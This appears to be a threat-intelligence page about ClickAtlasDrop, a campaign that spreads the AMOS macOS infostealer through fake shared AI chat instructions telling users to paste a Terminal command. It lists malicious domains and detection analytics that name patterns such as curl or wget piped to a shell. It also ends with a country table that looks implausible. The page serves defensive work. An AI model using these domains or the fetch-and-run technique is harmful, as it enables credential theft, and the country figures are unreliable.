Campaigns
New AMOS Attack Path Demonstrates Security Gaps in AI Usage

New AMOS Attack Path Demonstrates Security Gaps in AI Usage

AI-trust abuseAMOS InfoStealerfake Atlas browserAtomic macOS Stealer
ShareClick AtlasDrop is a macOS infostealer distribution effort that exploits user confidence in reputable AI platforms. Operators manipulate Google Search results with paid links or SEO-enhanced sites that direct users to seemingly authentic shared AI dialogues. These discussions include refined "fix" or "installer" procedures and encourage victims to replicate a Terminal command. The program retrieves a remote script, extracts the user's password using social engineering, launches AMOS (Atomic macOS Stealer), and establishes persistence to sustain access and facilitate ongoing data exfiltration.

Indicators of Compromise

jey90080425s.cfd
haxmac.cc
riv4d3dsr17042596.com
im9ov070725iqu.com
toutentris.com
ekochist.com
misshon.com
dtxxbz1jq070725p93.cfd
goipbp9080425d4.cfd
halesmp.com
x5vw0y8h70804254.cfd

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION REF


Malicious File (T1204.002)


ID

Name

Analytic ID

Analytic Description

DET0294

User Execution – Malicious File via download/open → spawn chain (T1204.002)

AN0819

User opens a file delivered by email, web, chat, or share. The handler application (Word/PDF reader/archiver) creates a file in user-controlled paths (Downloads, Temp, Desktop) and then spawns a new or unusual child process (e.g., powershell.exe, wscript.exe, cmd.exe, regsvr32.exe, rundll32.exe, msiexec.exe). Optional precursors include FileStreamCreated (URL/UNC) and Office → system32 batch writes.

AN0820

User opens a downloaded document/installer leading to EndpointSecurity file create in ~/Downloads or ~/Library paths then an exec of a suspicious utility (osascript, bash/zsh, curl, chmod, open with -a Terminal). Correlates File Creation with subsequent process exec and, optionally, quarantine/LSQuarantine events.

AN0821

User or desktop application writes a new file to ~/Downloads, /tmp, or mounted removable media followed by execve of a risky interpreter/loader (bash, sh, python, perl, php, node, curl|wget piping to sh, ld.so, rdesktop, xdg-open - with unusual args). Uses auditd PATH+SYSCALL (open/creat/write/rename) with execve event linking.


User Execution: Malicious Image(T1204.003)

ID

Name

Analytic ID

Analytic Description

DET0248

User Execution – Malicious Image (containers & IaaS) – pull/run → start → anomalous behavior (T1204.003)

AN0691

CONTAINERS (Docker/K8s/containerd): A user pulls an untrusted image from a public/unknown registry and then creates/starts a container from that image. Shortly after start, the container spawns unexpected utilities (e.g., curl/wget/bash/python), or makes outbound network connections atypical for the namespace/workload. The analytic correlates Image Creation/Download → Container Creation → Container Start → Command Execution/Network activity within a short window and with a consistent image digest.

AN0692

IAAS (Cloud images/VMs): A new VM/instance is launched from a non-approved or newly-seen image (AMI/GCP Image/Azure Image). On first boot, cloud-init/user-data or embedded agents download code, spawn system utilities, or open outbound C2/mining traffic. The analytic correlates Instance/Image Creation → Instance Start → in-guest Process/Command Execution and/or anomalous network traffic.


Phishing(T1566)


ID

Name

Analytic ID

Analytic Description

DET0070

Detection Strategy for Phishing across platforms.

AN0188

Unusual inbound email activity where attachments or embedded URLs are delivered to users followed by execution of new processes or suspicious document behavior. Detection involves correlating email metadata, file creation, and network activity after a phishing message is received.

AN0189

Monitor for malicious payload delivery through phishing where attachments or URLs in email clients (e.g., Thunderbird, mutt) result in unusual file creation or outbound network connections. Focus on correlation between mail logs, file writes, and execution activity.

AN0190

Detection of phishing through anomalous Mail app activity, such as attachments saved to disk and immediately executed, or Safari/Preview launching URLs and files linked from email messages. Correlate UnifiedLogs events with subsequent process execution.

AN0191

Phishing via Office documents containing embedded macros or links that spawn processes. Detection relies on correlating Office application logs with suspicious child process execution and outbound network connections.

AN0192

Phishing attempts targeting IdPs often manifest as anomalous login attempts from suspicious email invitations or fake SSO prompts. Detection correlates login flows, MFA bypass attempts, and anomalous geographic patterns following phishing email delivery.

AN0193

Phishing delivered via SaaS services (chat, collaboration platforms) where messages contain malicious URLs or attachments. Detect anomalous link clicks, suspicious file uploads, or token misuse after SaaS-based phishing attempts.


Application Layer Protocol


ID

Name

Analytic ID

Analytic Description

DET0444

Detection of Command and Control Over Application Layer Protocols

AN1225

Detects suspicious usage of common application-layer protocols (e.g., HTTP, HTTPS, DNS, SMB) by abnormal processes, with high outbound byte counts or irregular ports, possibly indicating command and control or data exfiltration.

AN1226

Detects suspicious curl, wget, or custom socket traffic that leverages DNS, HTTPS, or IRC-style protocols with unbalanced traffic or beacon-like intervals.

AN1227

Detects applications using abnormal protocols or high volume traffic not previously associated with the process image, such as Automator or AppleScript invoking curl or python sockets.

AN1228

Detects application-layer tunneling or unauthorized app protocols like DNS-over-HTTPS, embedded C2 in TLS/HTTP headers, or misused SMB traffic crossing VLANs.


Ingress Tool Transfer(T1105)


ID

Name

Analytic ID

Analytic Description

DET0060

Detect Ingress Tool Transfers via Behavioral Chain

AN0165

Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded).

AN0166

Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk.

AN0167

Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories.

AN0168

Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.

AN0169

Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks.


Command and Scripting Interpreter(T1059)


ID

Name

Analytic ID

Analytic Description

DET0516

Behavioral Detection of Command and Scripting Interpreter Abuse

AN1428

Detects the execution of scripting or command interpreters (e.g., powershell.exe, cmd.exe, wscript.exe) outside expected administrative time windows or from abnormal user contexts, often followed by encoded/obfuscated arguments or secondary execution events.

AN1429

Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.

AN1430

Detects launch of command-line interpreters via Terminal, Automator, or hidden osascript, especially when parent process lineage deviates from user-initiated applications.

AN1431

Detects use of 'esxcli system' or direct interpreter commands (e.g., busybox shell) invoked from SSH or host terminal unexpectedly.

AN1432

Identifies CLI interpreter access (e.g., Cisco IOS, Juniper JUNOS) via enable mode or scripting-capable sessions used by uncommon accounts or from unknown IPs.

Reports & References1

Observed Countries250

AD (451)
AE (144)
AF (623)
AG (500)
AI (268)
AL (361)
AM (817)
AO (981)
AQ (73)
AR (254)
AS (115)
AT (859)
AU (178)
AW (207)
AX (858)
AZ (141)
BA (724)
BB (617)
BD (852)
BE (596)
BF (277)
BG (547)
BH (838)
BI (382)
BJ (190)
BL (834)
BM (538)
BN (221)
BO (899)
BQ (147)
BR (744)
BS (662)
BT (303)
BV (688)
BW (385)
BY (705)
BZ (701)
CA (217)
CC (119)
CD (337)
CF (264)
CG (797)
CH (952)
CI (145)
CK (962)
CL (657)
CM (296)
CN (880)
CO (324)
CR (771)
CU (838)
CV (333)
CW (590)
CX (908)
CY (131)
CZ (954)
DE (894)
DJ (401)
DK (824)
DM (373)
DO (54)
DZ (146)
EC (945)
EE (780)
EG (203)
EH (880)
ER (31)
ES (642)
ET (354)
FI (6)
FJ (372)
FK (155)
FM (123)
FO (201)
FR (583)
GA (78)
GB (871)
GD (555)
GE (425)
GF (472)
GG (452)
GH (685)
GI (22)
GL (584)
GM (445)
GN (834)
GP (728)
GQ (145)
GR (794)
GS (1)
GT (529)
GU (973)
GW (6)
GY (302)
HK (801)
HM (723)
HN (50)
HR (539)
HT (888)
HU (575)
ID (157)
IE (230)
IL (924)
IM (444)
IN (84)
IO (935)
IQ (145)
IR (882)
IS (639)
IT (485)
JE (600)
JM (40)
JO (720)
JP (866)
KE (967)
KG (644)
KH (558)
KI (122)
KM (371)
KN (9)
KP (135)
KR (934)
KW (517)
KY (580)
KZ (17)
LA (328)
LB (310)
LC (377)
LI (950)
LK (330)
LR (6)
LS (269)
LT (280)
LU (362)
LV (472)
LY (15)
MA (332)
MC (431)
MD (809)
ME (880)
MF (602)
MG (239)
MH (200)
MK (878)
ML (142)
MM (987)
MN (901)
MO (897)
MP (4)
MQ (282)
MR (430)
MS (260)
MT (308)
MU (504)
MV (643)
MW (126)
MX (993)
MY (648)
MZ (833)
NA (748)
NC (826)
NE (314)
NF (900)
NG (221)
NI (218)
NL (249)
NO (912)
NP (671)
NR (367)
NU (909)
NZ (911)
OM (78)
PA (84)
PE (247)
PF (138)
PG (796)
PH (642)
PK (38)
PL (597)
PM (433)
PN (483)
PR (543)
PS (542)
PT (222)
PW (646)
PY (856)
QA (908)
RE (564)
RO (787)
RS (726)
RU (530)
RW (339)
SA (79)
SB (377)
SC (364)
SD (351)
SE (243)
SG (123)
SH (462)
SI (852)
SJ (41)
SK (952)
SL (237)
SM (6)
SN (476)
SO (934)
SR (379)
SS (670)
ST (729)
SV (563)
SX (724)
SY (839)
SZ (270)
TC (113)
TD (805)
TF (198)
TG (632)
TH (78)
TJ (626)
TK (994)
TL (85)
TM (94)
TN (962)
TO (774)
TR (206)
TT (741)
TV (594)
TW (663)
TZ (984)
UA (462)
UG (791)
UM (15)
US (432)
UY (836)
UZ (700)
VA (968)
VC (943)
VE (850)
VG (707)
VI (944)
VN (853)
VU (275)
WF (825)
WS (40)
XK (255)
YE (156)
YT (379)
ZA (363)
ZM (843)
ZW (920)